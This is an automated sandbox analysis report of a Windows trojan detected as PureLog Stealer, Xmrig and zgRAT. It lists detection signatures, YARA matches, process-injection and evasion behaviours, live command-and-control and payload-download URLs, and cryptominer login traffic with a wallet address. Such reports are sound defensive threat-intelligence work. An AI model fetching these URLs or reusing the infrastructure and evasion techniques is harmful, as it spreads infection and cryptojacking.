Windows Analysis Report
KPn7VgIWQj.exe

Overview

General Information

Sample name: KPn7VgIWQj.exe
renamed because original name is a hash value
Original sample name: 7ec2e77211e97af72575872b8cc081a5.exe
Analysis ID: 1430432
MD5: 7ec2e77211e97af72575872b8cc081a5
SHA1: 6bb22149e38bc7d5b97dc36027256a8ef7c83081
SHA256: fcc68f6e41b44762bd7e9ce1213b366ee10790b5b0e668a8f74d050a36fdfd1f
Tags: 64exetrojan
Infos:

Detection

PureLog Stealer, Xmrig, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected PureLog Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Detected Stratum mining protocol
Drops PE files to the user root directory
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
Name Description Attribution Blogpost URLs Link
zgRAT zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

barindex
Source: http://185.196.10.233/dll/ghghghgfg.xml Avira URL Cloud: Label: malware
Source: C:\Users\user\KPn7VgIWQj.exe ReversingLabs: Detection: 21%
Source: KPn7VgIWQj.exe ReversingLabs: Detection: 21%

Bitcoin Miner

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 6.2.ilasm.exe.20391010b80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ilasm.exe.20391010b80.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ilasm.exe.203917796c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ilasm.exe.20390ae7348.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ilasm.exe.203917796c8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.AddInProcess.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ilasm.exe.20390ae7348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1475678404.00000001407A9000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1479664899.0000015C9C6A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3758786261.0000017F3AAD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1474573291.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3758797077.0000028B3C207000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3758786261.0000017F3AB07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3764979928.0000020391475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3758797077.0000028B3C1D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3764979928.0000020391BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3764979928.0000020390ACF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3764979928.0000020391778000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1474573291.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ilasm.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess.exe PID: 7476, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess.exe PID: 7572, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess.exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess.exe PID: 7608, type: MEMORYSTR
Source: global traffic TCP traffic: 192.168.2.7:49711 -> 185.196.10.233:35662 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"zephs72fkdmidnggbpghxjhndpe49prja1tvhrycwapy9vlqpybiqf527bidskd3jsjydzy5ubzexc3fnoxu4rbvgyx1b5vnkjf.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Source: global traffic TCP traffic: 192.168.2.7:49712 -> 185.196.10.233:35662 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"zephs72fkdmidnggbpghxjhndpe49prja1tvhrycwapy9vlqpybiqf527bidskd3jsjydzy5ubzexc3fnoxu4rbvgyx1b5vnkjf.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Source: global traffic TCP traffic: 192.168.2.7:49713 -> 185.196.10.233:35662 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"zephs72fkdmidnggbpghxjhndpe49prja1tvhrycwapy9vlqpybiqf527bidskd3jsjydzy5ubzexc3fnoxu4rbvgyx1b5vnkjf.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Source: ilasm.exe, 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: ilasm.exe, 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: ilasm.exe, 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: ilasm.exe, 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: ilasm.exe, 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: ilasm.exe, 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: XMRig 6.21.0
Source: KPn7VgIWQj.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: Nqzffhk.pdb source: ilasm.exe, 00000006.00000002.3913939775.00000203FCE70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: ilasm.exe, 00000006.00000002.3896869499.00000203980D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: ilasm.exe, 00000006.00000002.3896869499.00000203980D0000.00000004.08000000.00040000.00000000.sdmp

Networking

barindex
Source: global traffic TCP traffic: 185.196.10.233 ports 39001,0,1,3,35662,80,9
Source: global traffic TCP traffic: 192.168.2.7:49700 -> 185.196.10.233:39001
Source: global traffic HTTP traffic detected: GET /dll/ghghghgfg.xml HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 185.196.10.233 185.196.10.233
Source: Joe Sandbox View IP Address: 185.196.10.233 185.196.10.233
Source: Joe Sandbox View ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /dll/ghghghgfg.xml HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: time.windows.com
Source: ilasm.exe, 00000006.00000002.3906334051.00000203FB484000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.196.10.233/dll/ghghghgfg.xml
Source: ilasm.exe, 00000006.00000002.3758077873.0000020380001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.196.10.233/dll/ghghghgfg.xmlQ
Source: KPn7VgIWQj.exe, KPn7VgIWQj.exe.0.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: KPn7VgIWQj.exe, KPn7VgIWQj.exe.0.dr String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: KPn7VgIWQj.exe, KPn7VgIWQj.exe.0.dr String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: ilasm.exe, 00000006.00000002.3758077873.0000020380001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://files.catbox.moe/k541xr.dll
Source: ilasm.exe, 00000006.00000002.3906334051.00000203FB484000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://files.catbox.moe/k541xr.dllJ
Source: ilasm.exe, 00000006.00000002.3758077873.0000020380001000.00000004.00000800.00020000.00000000.sdmp, ilasm.exe, 00000006.00000002.3906334051.00000203FB484000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://files.catbox.moe/kwfxr7.dll
Source: ilasm.exe, 00000006.00000002.3896869499.00000203980D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: ilasm.exe, 00000006.00000002.3896869499.00000203980D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: ilasm.exe, 00000006.00000002.3896869499.00000203980D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: ilasm.exe, 00000006.00000002.3896869499.00000203980D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: ilasm.exe, 00000006.00000002.3758077873.0000020380001000.00000004.00000800.00020000.00000000.sdmp, ilasm.exe, 00000006.00000002.3896869499.00000203980D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: ilasm.exe, 00000006.00000002.3896869499.00000203980D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: ilasm.exe, 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp, ilasm.exe, 00000006.00000002.3764979928.0000020391475000.00000004.00000800.00020000.00000000.sdmp, ilasm.exe, 00000006.00000002.3764979928.0000020391BDE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000A.00000002.1474573291.0000000140465000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: ilasm.exe, 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp, ilasm.exe, 00000006.00000002.3764979928.0000020391475000.00000004.00000800.00020000.00000000.sdmp, ilasm.exe, 00000006.00000002.3764979928.0000020391BDE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000A.00000002.1474573291.0000000140465000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: ilasm.exe, 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp, ilasm.exe, 00000006.00000002.3764979928.0000020391475000.00000004.00000800.00020000.00000000.sdmp, ilasm.exe, 00000006.00000002.3764979928.0000020391BDE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000A.00000002.1474573291.0000000140465000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: ilasm.exe, 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp, ilasm.exe, 00000006.00000002.3764979928.0000020391475000.00000004.00000800.00020000.00000000.sdmp, ilasm.exe, 00000006.00000002.3764979928.0000020391BDE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000000A.00000002.1474573291.0000000140465000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s

System Summary

barindex
Source: 6.2.ilasm.exe.203fce70000.6.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 6.2.ilasm.exe.203fce70000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 6.2.ilasm.exe.20391010b80.2.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 6.2.ilasm.exe.20391010b80.2.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 6.2.ilasm.exe.20391010b80.2.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 6.2.ilasm.exe.20390ae7348.1.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 6.2.ilasm.exe.20390ae7348.1.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 6.2.ilasm.exe.20390ae7348.1.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 6.2.ilasm.exe.203917796c8.3.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 6.2.ilasm.exe.203917796c8.3.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 6.2.ilasm.exe.203917796c8.3.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 10.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 10.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 10.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000000A.00000002.1474573291.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000006.00000002.3764979928.0000020391475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000006.00000002.3913939775.00000203FCE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000006.00000002.3764979928.0000020391BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000006.00000002.3764979928.0000020390F4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: ilasm.exe PID: 7180, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: AddInProcess.exe PID: 7476, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Process Stats: CPU usage > 49%
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC6B4C8D NtUnmapViewOfSection, 6_2_00007FFAAC6B4C8D
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC12C20 0_2_00007FF68BC12C20
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC10B10 0_2_00007FF68BC10B10
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC0EA70 0_2_00007FF68BC0EA70
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBFB050 0_2_00007FF68BBFB050
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC1D240 0_2_00007FF68BC1D240
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC117E0 0_2_00007FF68BC117E0
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBF4CD0 0_2_00007FF68BBF4CD0
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBFFBD0 0_2_00007FF68BBFFBD0
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBF8AF0 0_2_00007FF68BBF8AF0
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC01A00 0_2_00007FF68BC01A00
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBF5980 0_2_00007FF68BBF5980
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC100D0 0_2_00007FF68BC100D0
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBEA020 0_2_00007FF68BBEA020
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC14D80 0_2_00007FF68BC14D80
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC16390 0_2_00007FF68BC16390
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC0B350 0_2_00007FF68BC0B350
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC022E0 0_2_00007FF68BC022E0
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BD0C190 0_2_00007FF68BD0C190
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC01142 0_2_00007FF68BC01142
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BC15910 0_2_00007FF68BC15910
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC504A0A 6_2_00007FFAAC504A0A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC501AA1 6_2_00007FFAAC501AA1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC50562D 6_2_00007FFAAC50562D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC503FFA 6_2_00007FFAAC503FFA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC501AC0 6_2_00007FFAAC501AC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC5D5731 6_2_00007FFAAC5D5731
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC5D1B44 6_2_00007FFAAC5D1B44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC5D3184 6_2_00007FFAAC5D3184
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC5D2DD4 6_2_00007FFAAC5D2DD4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC5D2EB4 6_2_00007FFAAC5D2EB4
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A682C20 8_2_00007FF72A682C20
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A67EA70 8_2_00007FF72A67EA70
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A680B10 8_2_00007FF72A680B10
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A66B050 8_2_00007FF72A66B050
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A68D240 8_2_00007FF72A68D240
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A6817E0 8_2_00007FF72A6817E0
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A66FBD0 8_2_00007FF72A66FBD0
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A664CD0 8_2_00007FF72A664CD0
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A665980 8_2_00007FF72A665980
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A671A00 8_2_00007FF72A671A00
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A668AF0 8_2_00007FF72A668AF0
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A65A020 8_2_00007FF72A65A020
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A6800D0 8_2_00007FF72A6800D0
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A684D80 8_2_00007FF72A684D80
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A686390 8_2_00007FF72A686390
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A67B350 8_2_00007FF72A67B350
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A671142 8_2_00007FF72A671142
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A77C190 8_2_00007FF72A77C190
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A6722E0 8_2_00007FF72A6722E0
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A685910 8_2_00007FF72A685910
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: String function: 00007FF68BBEB360 appears 52 times
Source: C:\Users\user\KPn7VgIWQj.exe Code function: String function: 00007FF72A65B360 appears 52 times
Source: KPn7VgIWQj.exe Binary or memory string: OriginalFilename vs KPn7VgIWQj.exe
Source: KPn7VgIWQj.exe, 00000000.00000000.1300243433.00007FF68BF05000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUtuQONiseN* vs KPn7VgIWQj.exe
Source: KPn7VgIWQj.exe, 00000000.00000002.1329969285.0000028017D51000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUtuQONiseN* vs KPn7VgIWQj.exe
Source: KPn7VgIWQj.exe, 00000000.00000002.1329969285.0000028017D51000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePxcsesk.exe" vs KPn7VgIWQj.exe
Source: KPn7VgIWQj.exe Binary or memory string: OriginalFilename vs KPn7VgIWQj.exe
Source: KPn7VgIWQj.exe, 00000008.00000002.1598929369.0000029DE4BE1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUtuQONiseN* vs KPn7VgIWQj.exe
Source: KPn7VgIWQj.exe, 00000008.00000002.1598929369.0000029DE4BE1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePxcsesk.exe" vs KPn7VgIWQj.exe
Source: KPn7VgIWQj.exe, 00000008.00000002.1721004168.00007FF72A975000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenameUtuQONiseN* vs KPn7VgIWQj.exe
Source: KPn7VgIWQj.exe Binary or memory string: OriginalFilenameUtuQONiseN* vs KPn7VgIWQj.exe
Source: KPn7VgIWQj.exe.0.dr Binary or memory string: OriginalFilenameUtuQONiseN* vs KPn7VgIWQj.exe
Source: 6.2.ilasm.exe.203fce70000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 6.2.ilasm.exe.203fce70000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 6.2.ilasm.exe.20391010b80.2.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 6.2.ilasm.exe.20391010b80.2.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 6.2.ilasm.exe.20391010b80.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 6.2.ilasm.exe.20390ae7348.1.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 6.2.ilasm.exe.20390ae7348.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 6.2.ilasm.exe.20390ae7348.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
